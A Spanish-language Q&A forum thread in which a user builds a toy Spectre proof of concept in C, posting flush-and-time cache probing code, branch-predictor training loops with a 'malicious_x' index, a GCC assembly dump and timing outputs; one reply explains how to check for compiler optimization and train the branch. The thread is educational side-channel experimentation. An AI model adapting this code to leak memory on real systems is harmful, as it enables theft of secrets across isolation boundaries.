Specter - Concepto de optimización de código / Capacitación de sucursal [cerrado]

0

Intentando cargar "a" (en minúsculas a) especulativamente usando Specter.

Fue insinuado aquí:

Spectre PoC - Basado en papel - resultados opuestos

que el problema por el que no se carga de forma especulativa, podría ser

  • rama no entrenada
  • optimización del compilador

Aquí está el código:

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif




void main(void)
{
volatile uint8_t array1[104] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97 };

uint8_t array2[256 * 512];

for(int i = 0; i < sizeof(array2); i++)
  array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */


for(int i = 0; i < 256; i++)
  _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */



printf("%c is speculatively executed\n",array1[103]);



int dummy = 0;
for(int i=0; i<104; i++) {
 if (i != 103) {
    array2[array1[i] * 512] = array1[i]; 
 }
}



int t0,time_taken = 0;
int junk = 0;

int mix_i=0;

 int i,j;
    int aux,res;

    char RandomId[28];
    char ListId[28]={65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,49};



    srand(time(NULL));

    for(i=0; i<28; i++)
    {
        res = rand() % 28;
        aux = ListId[res];

        if (ListId[res] != -1)
        {
            RandomId[i] = aux;
            ListId[res] = -1;
        }
        else
            i--;
    }



volatile uint8_t * addr;
int y=0;


  for(int i=0; i<28; i++)
  {
    mix_i = RandomId[i];
    addr = &array2[mix_i * 512];
    t0 = __rdtscp(&junk); 
    junk = *addr;
    time_taken = __rdtscp(&junk) - t0;
    if(mix_i>=49 && mix_i<=97)
      if(mix_i==49)
        printf("%c is not cached\n",mix_i); 
      printf("trying: %c time: %i\n",mix_i,time_taken);
  }
}

Creo que espero que la optimización del compilador no sea el problema.

2 preguntas:

  1. ¿Cómo puedo verificar si el compilador lo optimizó?
  2. ¿Cómo puedo entrenar la rama?

¿Alguien puede explicar el segundo en este ejemplo o en este simple (con ejemplo de código, salidas gdb)?

Gracias,

Actualización 1:

Compilado el fragmento sensible (para bucle).

user@laptop:~/labspectre$ cat test.c
#include <stdlib.h>
#include <stdio.h>
#include <stdint.h>


void main(void)
{
volatile uint8_t array1[104] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97 };

uint8_t array2[256 * 512];


int dummy = 0;
for(int i=0; i<104; i++) {
 if (i != 103) {
    array2[array1[i] * 512] = array1[i];
 }
}
}

Aquí está el volcado de asm:

user@laptop:~/labspectre$ cat test.s
    .file   "test.c"
    .text
    .globl  main
    .type   main, @function
main:
.LFB2:
    .cfi_startproc
    pushq   %rbp
    .cfi_def_cfa_offset 16
    .cfi_offset 6, -16
    movq    %rsp, %rbp
    .cfi_def_cfa_register 6
    subq    $131328, %rsp
    movq    %fs:40, %rax
    movq    %rax, -8(%rbp)
    xorl    %eax, %eax
    movb    $65, -131200(%rbp)
    movb    $66, -131199(%rbp)
    movb    $67, -131198(%rbp)
    movb    $68, -131197(%rbp)
    movb    $69, -131196(%rbp)
    movb    $70, -131195(%rbp)
    movb    $71, -131194(%rbp)
    movb    $72, -131193(%rbp)
    movb    $73, -131192(%rbp)
    movb    $74, -131191(%rbp)
    movb    $75, -131190(%rbp)
    movb    $76, -131189(%rbp)
    movb    $77, -131188(%rbp)
    movb    $78, -131187(%rbp)
    movb    $79, -131186(%rbp)
    movb    $80, -131185(%rbp)
    movb    $81, -131184(%rbp)
    movb    $82, -131183(%rbp)
    movb    $83, -131182(%rbp)
    movb    $84, -131181(%rbp)
    movb    $85, -131180(%rbp)
    movb    $86, -131179(%rbp)
    movb    $87, -131178(%rbp)
    movb    $88, -131177(%rbp)
    movb    $89, -131176(%rbp)
    movb    $90, -131175(%rbp)
    movb    $65, -131174(%rbp)
    movb    $66, -131173(%rbp)
    movb    $67, -131172(%rbp)
    movb    $68, -131171(%rbp)
    movb    $69, -131170(%rbp)
    movb    $70, -131169(%rbp)
    movb    $71, -131168(%rbp)
    movb    $72, -131167(%rbp)
    movb    $73, -131166(%rbp)
    movb    $74, -131165(%rbp)
    movb    $75, -131164(%rbp)
    movb    $76, -131163(%rbp)
    movb    $77, -131162(%rbp)
    movb    $78, -131161(%rbp)
    movb    $79, -131160(%rbp)
    movb    $80, -131159(%rbp)
    movb    $81, -131158(%rbp)
    movb    $82, -131157(%rbp)
    movb    $83, -131156(%rbp)
    movb    $84, -131155(%rbp)
    movb    $85, -131154(%rbp)
    movb    $86, -131153(%rbp)
    movb    $87, -131152(%rbp)
    movb    $88, -131151(%rbp)
    movb    $89, -131150(%rbp)
    movb    $90, -131149(%rbp)
    movb    $65, -131148(%rbp)
    movb    $66, -131147(%rbp)
    movb    $67, -131146(%rbp)
    movb    $68, -131145(%rbp)
    movb    $69, -131144(%rbp)
    movb    $70, -131143(%rbp)
    movb    $71, -131142(%rbp)
    movb    $72, -131141(%rbp)
    movb    $73, -131140(%rbp)
    movb    $74, -131139(%rbp)
    movb    $75, -131138(%rbp)
    movb    $76, -131137(%rbp)
    movb    $77, -131136(%rbp)
    movb    $78, -131135(%rbp)
    movb    $79, -131134(%rbp)
    movb    $80, -131133(%rbp)
    movb    $81, -131132(%rbp)
    movb    $82, -131131(%rbp)
    movb    $83, -131130(%rbp)
    movb    $84, -131129(%rbp)
    movb    $85, -131128(%rbp)
    movb    $86, -131127(%rbp)
    movb    $87, -131126(%rbp)
    movb    $88, -131125(%rbp)
    movb    $89, -131124(%rbp)
    movb    $90, -131123(%rbp)
    movb    $65, -131122(%rbp)
    movb    $66, -131121(%rbp)
    movb    $67, -131120(%rbp)
    movb    $68, -131119(%rbp)
    movb    $69, -131118(%rbp)
    movb    $70, -131117(%rbp)
    movb    $71, -131116(%rbp)
    movb    $72, -131115(%rbp)
    movb    $73, -131114(%rbp)
    movb    $74, -131113(%rbp)
    movb    $75, -131112(%rbp)
    movb    $76, -131111(%rbp)
    movb    $77, -131110(%rbp)
    movb    $78, -131109(%rbp)
    movb    $79, -131108(%rbp)
    movb    $80, -131107(%rbp)
    movb    $81, -131106(%rbp)
    movb    $82, -131105(%rbp)
    movb    $83, -131104(%rbp)
    movb    $84, -131103(%rbp)
    movb    $85, -131102(%rbp)
    movb    $86, -131101(%rbp)
    movb    $87, -131100(%rbp)
    movb    $88, -131099(%rbp)
    movb    $89, -131098(%rbp)
    movb    $97, -131097(%rbp)
    movq    -131200(%rbp), %rax
    movq    %rax, -131312(%rbp)
    movq    -131192(%rbp), %rax
    movq    %rax, -131304(%rbp)
    movq    -131184(%rbp), %rax
    movq    %rax, -131296(%rbp)
    movq    -131176(%rbp), %rax
    movq    %rax, -131288(%rbp)
    movq    -131168(%rbp), %rax
    movq    %rax, -131280(%rbp)
    movq    -131160(%rbp), %rax
    movq    %rax, -131272(%rbp)
    movq    -131152(%rbp), %rax
    movq    %rax, -131264(%rbp)
    movq    -131144(%rbp), %rax
    movq    %rax, -131256(%rbp)
    movq    -131136(%rbp), %rax
    movq    %rax, -131248(%rbp)
    movq    -131128(%rbp), %rax
    movq    %rax, -131240(%rbp)
    movq    -131120(%rbp), %rax
    movq    %rax, -131232(%rbp)
    movq    -131112(%rbp), %rax
    movq    %rax, -131224(%rbp)
    movq    -131104(%rbp), %rax
    movq    %rax, -131216(%rbp)
    movl    $0, -131316(%rbp)
    movl    $0, -131320(%rbp)
    jmp .L2
.L4:
    cmpl    $103, -131320(%rbp)
    je  .L3
    movl    -131320(%rbp), %eax
    cltq
    movzbl  -131312(%rbp,%rax), %eax
    movzbl  %al, %eax
    sall    $9, %eax
    movl    %eax, %ecx
    movl    -131320(%rbp), %eax
    cltq
    movzbl  -131312(%rbp,%rax), %edx
    movslq  %ecx, %rax
    movb    %dl, -131088(%rbp,%rax)
.L3:
    addl    $1, -131320(%rbp)
.L2:
    cmpl    $103, -131320(%rbp)
    jle .L4
    nop
    movq    -8(%rbp), %rax
    xorq    %fs:40, %rax
    je  .L5
    call    __stack_chk_fail
.L5:
    leave
    .cfi_def_cfa 7, 8
    ret
    .cfi_endproc
.LFE2:
    .size   main, .-main
    .ident  "GCC: (Ubuntu 5.4.0-6ubuntu1~16.04.5) 5.4.0 20160609"
    .section    .note.GNU-stack,"",@progbits
user@laptop:~/labspectre$

A mi me parece bien. Veo la carga de la matriz y que:

cmpl    $103, -131320(%rbp)
        je  .L3

Comprueba el valor de 103 en el bucle.

¿Entonces está NO optimizado? Derecho?

Actualización 3:

OK, esta vez creo que funciona. Cargo "a" y "b" especulativamente. Como puede ver, no están cargados en el Código.

#include <string.h>
#include <stdio.h>
#include <stdlib.h>
#include <stdint.h>
#ifdef _MSC_VER
#include <intrin.h> /* for rdtscp and clflush */
#pragma optimize("gt",on)
#else
#include <x86intrin.h> /* for rdtscp and clflush */
#endif




void main(void)
{
    //array of chars A-Z and "a" and "b" at the end
    volatile uint8_t array1[105] = { 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90, 65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,97,98 };

    uint8_t array2[256 * 512];

    for(int i = 0; i < sizeof(array2); i++)
        array2[i] = 1; /* write to array2 so in RAM not copy-on-write zero pages */


    for(int i = 0; i < 256; i++)
        _mm_clflush(&array2[i * 512]); /* intrinsic for clflush instruction */



    printf("%c and %c are speculatively executed/loaded\n",array1[103],array1[104]);

    srand(time(NULL));


    unsigned int array1_size = 16;
    int r,j = 0;

    r = rand();


    int tries = 0;
    size_t training_x, x;


    size_t malicious_x=r;
    //printf("malicious_x: %i\n",malicious_x);

    for (tries = 999; tries > 0; tries--) {

        training_x = tries % array1_size; 

        /* 30 loops: 5 training runs (x=training_x) per attack run (x=malicious_x) */
        for (j = 29; j >= 0; j--) {
            _mm_clflush(&array1_size);
            for (volatile int z = 0; z < 100; z++) {} /* Delay (can also mfence) */

            /* Bit twiddling to set x=training_x if j%6!=0 or malicious_x if j%6==0 */
            /* Avoid jumps in case those tip off the branch predictor */
            x = ((j % 6) - 1) & ~0xFFFF; /* Set x=FFF.FF0000 if j%6==0, else x=0 */
            x = (x | (x >> 16)); /* Set x=-1 if j&6=0, else x=0 */
            x = training_x ^ (x & (malicious_x ^ training_x));

            /* Call the victim! */

            //printf("x: %i\n",x);         
            int dummy = 0;
            for(int i=0; i<105; i++) {
                //array[103] which is "a" will be loaded speculatively, as well as array[104]
                if (x<103) {
                    array2[array1[i] * 512] = array1[i]; 
                }
            }

        }

    }



    int t0,time_taken = 0;
    int junk = 0;

    int mix_i=0;

    int i;
    int aux,res;

    char RandomId[29];
    char ListId[29]={65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86,87,88,89,90,97,49,98};




    for(i=0; i<29; i++)
    {
        res = rand() % 29;
        aux = ListId[res];

        if (ListId[res] != -1)
        {
            RandomId[i] = aux;
            ListId[res] = -1;
        }
        else
            i--;
    }



    volatile uint8_t * addr;
    int y=0;


    for(int i=0; i<29; i++)
    {
        mix_i = RandomId[i];
        addr = &array2[mix_i * 512];
        t0 = __rdtscp(&junk); 
        junk = *addr;
        time_taken = __rdtscp(&junk) - t0;
        if(mix_i>=49 && mix_i<=98)
            if(mix_i==49)
                printf("%c is not cached\n",mix_i); 
        printf("trying: %c time: %i\n",mix_i,time_taken);
    }
}

Ejecución:

user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: P time: 96
trying: Y time: 92
trying: N time: 93
trying: A time: 118
trying: J time: 109
trying: O time: 92
trying: Z time: 92
1 is not cached
trying: 1 time: 316
trying: T time: 92
trying: X time: 93
trying: C time: 93
trying: R time: 92
trying: U time: 92
trying: G time: 92
trying: B time: 93
trying: E time: 93
trying: D time: 94
trying: M time: 93
trying: H time: 92
trying: Q time: 92
trying: V time: 93
trying: a time: 92
trying: b time: 134
trying: I time: 92
trying: L time: 93
trying: S time: 93
trying: W time: 92
trying: F time: 92
trying: K time: 270
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: Y time: 96
trying: J time: 219
trying: S time: 121
trying: R time: 92
trying: O time: 93
trying: A time: 113
trying: M time: 95
trying: Q time: 95
trying: U time: 123
trying: I time: 93
trying: N time: 93
trying: Z time: 92
trying: E time: 93
trying: H time: 92
trying: W time: 93
trying: K time: 92
1 is not cached
trying: 1 time: 305
trying: b time: 93
trying: D time: 93
trying: C time: 93
trying: L time: 95
trying: T time: 92
trying: X time: 93
trying: B time: 93
trying: a time: 92
trying: G time: 93
trying: V time: 93
trying: P time: 93
trying: F time: 95
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: W time: 96
trying: L time: 328
trying: I time: 93
1 is not cached
trying: 1 time: 305
trying: T time: 101
trying: G time: 93
trying: b time: 101
trying: E time: 93
trying: H time: 93
trying: F time: 93
trying: O time: 93
trying: C time: 122
trying: Q time: 94
trying: V time: 94
trying: a time: 93
trying: B time: 93
trying: A time: 96
trying: P time: 92
trying: Y time: 97
trying: Z time: 92
trying: S time: 93
trying: N time: 92
trying: U time: 92
trying: K time: 101
trying: J time: 93
trying: X time: 93
trying: M time: 93
trying: R time: 93
trying: D time: 107
user@laptop:~/labspectre$ ./spectre9
a and b are speculatively executed/loaded
trying: Q time: 941
trying: M time: 109
trying: A time: 101
trying: W time: 122
trying: N time: 93
trying: R time: 133
trying: H time: 94
trying: G time: 93
trying: Z time: 92
trying: B time: 94
trying: O time: 92
trying: C time: 98
trying: Y time: 93
trying: D time: 93
trying: F time: 92
trying: U time: 93
trying: P time: 95
trying: V time: 93
trying: S time: 93
trying: b time: 101
trying: T time: 92
trying: X time: 94
trying: I time: 93
trying: L time: 93
trying: E time: 92
trying: K time: 92
1 is not cached
trying: 1 time: 288
trying: a time: 92
trying: J time: 93

Los valores en caché son ca 90 ciclos, no cacheados ca 300 ciclos.

    
pregunta android_dev 18.01.2018 - 13:45
fuente

1 respuesta

1
  

¿Cómo puedo verificar si el compilador lo optimizó?

Compilar para ensamblar. Para GCC esta es la bandera "-S". Luego compare el ensamblaje con el código; por supuesto, debe comprender cómo leer el ensamblaje.

  

¿Cómo puedo entrenar la rama?

Vea la línea 59 del ejemplo exploit- enlace

Realiza la acción muchas veces con un valor que hace que se tome la rama. Luego te mueves al valor que no resulta en una forma que no sea "obvia" para el procesador.

    
respondido por el Hector 18.01.2018 - 14:03
fuente

Lea otras preguntas en las etiquetas